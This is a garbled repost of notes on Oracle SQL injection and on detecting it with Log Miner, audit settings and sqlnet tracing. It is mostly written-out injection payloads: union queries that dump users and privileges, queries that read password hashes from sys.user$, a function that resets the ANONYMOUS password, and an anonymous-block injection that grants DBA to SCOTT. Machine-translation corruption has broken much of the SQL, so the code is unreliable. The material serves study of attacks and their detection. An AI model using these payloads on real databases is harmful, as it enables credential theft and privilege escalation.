2. Tech
  3. Oracle injection summary

Oracle injection summary

xiaoxiao2021-03-06  109

Information: http://www.petefinnigan.com/papers/detect.sql '

A '=' a 'or 1 = 1

SQL> EXEC GET_CUST ('x' union select username from all_users where '' 'x' '=' '' '');

Debug: Select Customer_Phone from Customers Where Customer_Surname = 'X' Union

Select username from all_users where 'x' = 'x'

:: Aurora $ JIS $ UTILITY $

:: Aurora $ Orb $ Unauthenticated

:: CTXSYS

:: DBSNMP

:: Emil

:: fred

SQL> SELECT log_mode from v $ database;

SQL> SELECT NAME, VALUE FROM V $ Parameter

2 WHERE Name in ('log_archive_start', 'log_archive_dest');

Name

-------------------------------------------------- ----------------

Value

-------------------------------------------------- ------------------------------

LOG_ARCHIVE_START

True

Log_archive_dest

/ EXPORT / Home / U01 / App / Oracle / Admin / EMIL / ARCHIVE

SQL> SELECT NAME, VALUE FROM V $ Parameter

2 where name = 'transaction_auditing';

Name

-------------------------------------------------- ----------------

Value

-------------------------------------------------- ------------------------------

Transaction_auditing

True

Now execute the SQL injection attempt and then use Log Miner to see what is recorded To make the analysis easier for this example, the archive log is saved before and after to ensure only this command is in the log.:

SQL> Connect Sys as sysdba

ENTER Password:

Connected.

SQL> ALTER SYSTEM ARCHIVE LOG CURRENT;

System altered.

SQL>

SQL> Connect dbsnmp / dbsnmp@ Emil

Connected.

SQL> SET ServerOutput on size 100000

SQL> EXEC GET_CUST ('x' union select username from all_users where '' 'x' '=' '' '');

Debug: select customer_phone from customer_surname = 'x' unionselect usrname from all_users where 'x' = 'x'

:: Aurora $ JIS $ UTILITY $

:: Aurora $ Orb $ Unauthenticated

:: CTXSYS

:: DBSNMP

:: Emil

:: SYS

:: SYSTEM

:: WKSYS

:: Zulia

PL / SQL Procedure SuccessFully Completed.

SQL> Connect Sys as sysdba

ENTER Password:

Connected.

SQL> ALTER SYSTEM ARCHIVE LOG CURRENT;

System altered.

SQL>

First Create The Log Miner Dictionary:

SQL> SET ServerOutput on size 1000000

SQL> EXEC DBMS_LOGMNR_D.BUILD ('logmnr.dat', '/ tmp ");

Logmnr Dictionary Procedure Started

Logmnr Dictionary File Opened

Table: Obj $ Recorded in logmnr Dictionary File

TABLE: TAB $ Recorded in Logmnr Dictionary File

Table: Col $ recorded in logmnr Dictionary file

Table: TS $ Recorded in logmnr Dictionary File

Procedure EXECUTED SUCCESSFULLY - LOGMNR DICTIONARY CREATED

PL / SQL Procedure SuccessFully Completed.

SQL> SELECT NAME

2 from v $ archived_log

3 where completion_time = (select max (completion_time) from v $ archived_log);

Name

-------------------------------------------------- ------------------------------

/EXPORT/HOME/U01/app/oracle/admin/emil/archive/1_7.dbf

SQL>

Now loading the archive log file into log miner:

SQL> EXEC DBMS_LOGMNR.ADD_Logfile ('/ export / home / u01 / app / oracle / admin / emil / archive / 1_7.dbf', sys.dbms_logmnr.new);

PL / SQL Procedure SuccessFully Completed.

SQL> EXEC DBMS_LOGMNR.START_LOGMNR (DictFileName => '/ TMP/Logmnr.dat');

PL / SQL Procedure SuccessFully Completed.

SQL>

Finally, Search The Results:

SQL> SELECT SCN, UserName, TimeStamp, SQL_REDO

2 from v $ logmnr_contents

SQL>

SCN UserName TimeStamp SQL_REDO

---------- -------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------

253533 DBSNMP 16-JUN-03 SET Transaction Read Write

253533 DBSNMP 16-Jun-03 Update "SYS". "AUD $" set

"Action #" = '101',

"ReturnCode" = '0',

"Logoff $ LREAD" = '228',

"Logoff $ pread" = '0',

"Logoff $ LWRITE" = '10',

"Logoff $ dead" = '0',

"Logoff $ TIME" =

TO_DATE ('16 -jun-2003

12:16:12 ',' DD-MON-YYYY

SCN UserName TimeStamp SQL_REDO

---------- -------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------

HH24: MI: SS '), "sessioncpu" =

'5' Where "Action #" = '100'

And "returncode" = '0' and

"Logoff $ LREAD" is null and

"Logoff $ pread" is null and

"Logoff $ LWRITE" is null and

"Logoff $ dead" is null and

"Logoff $ TIME" is null and

"Sessioncpu" is null and rowid

= 'Aaaabiaabaaaaaewaax';

SCN UserName TimeStamp SQL_REDO

---------- -------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------

253534 DBSNMP 16-JUN-03 commit;

SQL> SELECT P.SPID, S.USERNAME

2 from V $ Session S, V $ Process P

3 WHERE S.PADDR = P.ADDR;

SPID Username

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

616 dbsnmp

556 System

9 rows selected.

SQL>

TO ENABLE TRACE SIMPLY Add The Following Lines to the $ ORACLE_HOME / Network / Admin / SQLNET.ORA FILE:

TRACE_FILE_SERVER = PF_TRACE.TRC

TRACE_DIRECTORY_SERVER = / TMP

TRACE_LEVEL_SERVER = Support

SQL> EXEC GET_CUST ('x' 'union select username from all_users where' '' '' = '' x '); PL / SQL Procedure SuccessFully Completed.

EXEC GET_CUST2 ('x' 'or' '' '' = '' x '' - ');

EXEC GET_CUST ('x' union select sys.login_user from sys.dual where '' '' '' '=' '' X ');

Exec get_cust ('x' union select to_char (sysdate) from sys.dual@plsq where '' 'x' '=' '' x ');

Exec get_cust 1, '' y '' from sys.dual where '' '' '' = '' 'X');

EXEC GET_CUST ('x' union select object_name, Object_type, '' x '' from user_objects where '' '' '' '=' 'x');

EXEC GET_CUST ('x' union select granted_role, admin_option, default_role from user_role_privs where '' '=' '');

EXEC GET_CUST ('x' union select privilege, admin_option, '' x '' from user_sys_privs where '' '' '' = '' x ');

EXEC GET_CUST_BIND ('CLARK');

EXEC GET_CUST_BIND ('x' union select username from all_users where '' 'x' '=' '' ');

Select customer_phone from customer_surname = 'x' select username from all_users where 'x' = 'x'

Select customer_phone from customer_surname = 'x' union select username from all_users where 'x' = 'x'

Select Customer_Phone from Customers Where Customer_Surname = 'x' or exists (SELECT 1 from

sys.dual) and 'x' = 'x'

Select customer_phone from customer = 'x' or 'x' = 'x'select customer_phone from customer =' x t om = 'x' - 'AND

Customer_Type = 1

Select Customer_Phone from Customers Where Customer_Surname = 'x' union select sys.login_user from sys.dual where 'x' = 'x'

Select Customer_Phone from Customers Where Customer_Surname = 'x' union select to_char (sysdate) from sys.dual@plsq where 'x' = 'x'

Select Customer_Phone, Customer_forname, Customer_Surname from Customers Where

Customer_Surname = 'x' union select 1, 'y' from sys.dual where 'x' = 'x'

Select customer_phone, customer_forname, customer_surname from customer = 'x' union select object_name, object_type, 'x' from user_objects where 'x' = 'x'

Select Customer_Phone, Customer_forname, Customer_Surname from Customers Where

Customer_surname = 'x' union select granted_role, admin_option, default_role from user_role_privs where 'x' = 'x'

Select Customer_Phone, Customer_forname, Customer_Surname from Customers Where

Customer_surname = 'x' union select privilege, admin_option, 'x' from user_sys_privs where 'x' = 'x'

SELECT Customer_Phone from Customers Where Customer_Surname =: Surname :: 999444888

Select Customer_Phone from Customers Where Customer_Surname =: Surname

EXEC GET_CUST ('x' union select username from all_users where '' x '=' 'x')

exec dbms_logmnr.add_logfile ( '/ export / home / u01 / app / oracle / admin / emil / archive / 1_7.dbf', sys.dbms_logmnr.NEW) exec dbms_logmnr.start_logmnr (dictFileName => '/tmp/logmnr.dat' )

EXEC GET_CUST ('x' union select username from all_users where '' x '=' 'x')

EXEC GET_CUST ('x' union select username from all_users where '' x '=' 'x')

EXEC GET_CUST ('x' union select username from all_users where '' x '=' 'x')

EXEC SYS.LIST_LIBRARIES ('sys');

EXEC SYS.LIST_LIBRARIES ('foo'''Union select password from sys.user $ -);

Select sys.select_count ('sys') from Dual;

Select sys.select_count ('sys' union select password from sys.user $ where name = "sys" -') from dual;

Select sys.select_count ('sys "Union Select User # from sys.user $ where name =" sys "-') from dual;

Select sys.select_count ('sys'and object name = (Select Password from sys.user $ where name = "sys" -') from Dual

Select sys.select_count ('foo "|| scott.get_it () -') from dual

Call Exec dbms_output.put_line ('output')

EXEC SYS.NEW_EMP ('foo "|| scott.get_it) -');

Create or Replace Function Rstpwd Return

VARCHAR2 Authi Current_User IS

MyStmt varchar2 (200);

Begin

MyStmt: = 'Update sys.user $ set password =

"Fe0e8ce7c92504e9" where name = "anonymous" ';

Execute immediate mystmt;

Return 'foo';

end

/

EXEC SYS.NEW_EMP ('P "| | Scott.rstpwd) -');

EXEC SYS.Anon_block ('foobar');

EXEC SYS.Anon_block ('f "); Execute Immediate" Grant DBA TO Scott "; End; -');

转载请注明原文地址:https://www.9cbs.com/read-101899.html

9cbs

New Post(0)